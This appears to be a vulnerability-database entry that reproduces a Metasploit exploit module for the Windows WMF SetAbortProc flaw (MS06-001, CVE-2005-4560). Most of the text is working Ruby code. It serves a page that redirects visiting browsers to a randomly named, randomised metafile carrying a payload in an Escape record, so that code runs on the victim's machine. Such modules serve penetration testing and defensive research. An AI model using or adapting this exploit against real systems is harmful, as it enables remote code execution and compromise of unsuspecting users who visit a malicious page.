Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution

2006-09-17T08:00:37
ID MSF:EXPLOIT/WINDOWS/BROWSER/MS06_001_WMF_SETABORTPROC
Type metasploit
Reporter Rapid7
Modified 2019-05-23T12:01:21

Description

This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in the GDI library included with
        Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
        to execute arbitrary code through the SetAbortProc procedure. This module
        generates a random WMF record stream for each request.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm',
          'san <san[at]xfocus.org>',
          'O600KO78RUS@unknown.ru',
        ],
      'References'     =>
        [
          ['CVE', '2005-4560'],
          ['OSVDB', '21987'],
          ['MSB', 'MS06-001'],
          ['BID', '16074'],
          ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 1000 + (rand(256).to_i * 4),
          'BadChars' => "\x00",
          'Compat'   =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP/2003/Vista Automatic', { }],
        ],
      'DisclosureDate' => 'Dec 27 2005',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)

    ext = 'wmf'

    if (not request.uri.match(/\.wmf$/i))
      if ("/" == get_resource[-1,1])
        wmf_uri = get_resource[0, get_resource.length - 1]
      else
        wmf_uri = get_resource
      end
      wmf_uri << "/" + rand_text_alphanumeric(rand(80)+16) + "." + ext

      html = "<html><meta http-equiv='refresh' content='0; " +
        "URL=#{wmf_uri}'><body>One second please...</body></html>"
      send_response_html(cli, html)
      return
    end

    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending #{self.name}")

    # Transmit the compressed response to the client
    send_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })

    # Handle the payload
    handler(cli)
  end

  def generate_metafile(payload)

    # Minimal length values before and after the Escape record
    pre_mlen = 1440 + rand(8192)
    suf_mlen = 128  + rand(8192)

    # Track the number of generated records
    fill = 0

    # The prefix and suffix buffers
    pre_buff = ''
    suf_buff = ''

    # Generate the prefix
    while (pre_buff.length < pre_mlen)
      pre_buff << generate_record()
      fill += 1
    end

    # Generate the suffix
    while (suf_buff.length < suf_mlen)
      suf_buff << generate_record()
      fill += 1
    end

    clen = 18 + 8 + 6 + payload.encoded.length + pre_buff.length + suf_buff.length
    data =
      #
      # WindowsMetaHeader
      #
      [
        # WORD  FileType;       /* Type of metafile (1=memory, 2=disk) */
        rand(2)+1,
        # WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
        9,
        # WORD  Version;        /* Version of Microsoft Windows used */
        ( rand(2).to_i == 1 ? 0x0300 : 0x0100 ),
        # DWORD FileSize;       /* Total size of the metafile in WORDs */
        clen/2,
        # WORD  NumOfObjects;   /* Number of objects in the file */
        rand(0xffff),
        # DWORD MaxRecordSize;  /* The size of largest record in WORDs */
        rand(0xffffffff),
        # WORD  NumOfParams;    /* Not Used (always 0) */
        rand(0xffff),
      ].pack('vvvVvVv') +
      #
      # Filler data
      #
      pre_buff +
      #
      # StandardMetaRecord - Escape()
      #
      [
        # DWORD Size;          /* Total size of the record in WORDs */
        4,
        # WORD  Function;      /* Function number (defined in WINDOWS.H) */
        (rand(256).to_i << 8) + 0x26,
        # WORD  Parameters[];  /* Parameter values passed to function */
        9,
      ].pack('Vvv') + payload.encoded +
      #
      # Filler data
      #
      suf_buff +
      #
      # Complete the stream
      #
      [3, 0].pack('Vv') +
      #
      # Some extra fun padding
      #
      rand_text(rand(16384)+1024)

    return data

  end

  def generate_record
    type = rand(3)

    case type
      when 0
        # CreatePenIndirect
        return [8, 0x02fa].pack('Vv') + rand_text(10)
      when 1
        # CreateBrushIndirect
        return [7, 0x02fc].pack('Vv') + rand_text(8)
      else
        # Rectangle
        return [7, 0x041b].pack('Vv') + rand_text(8)
    end
  end
end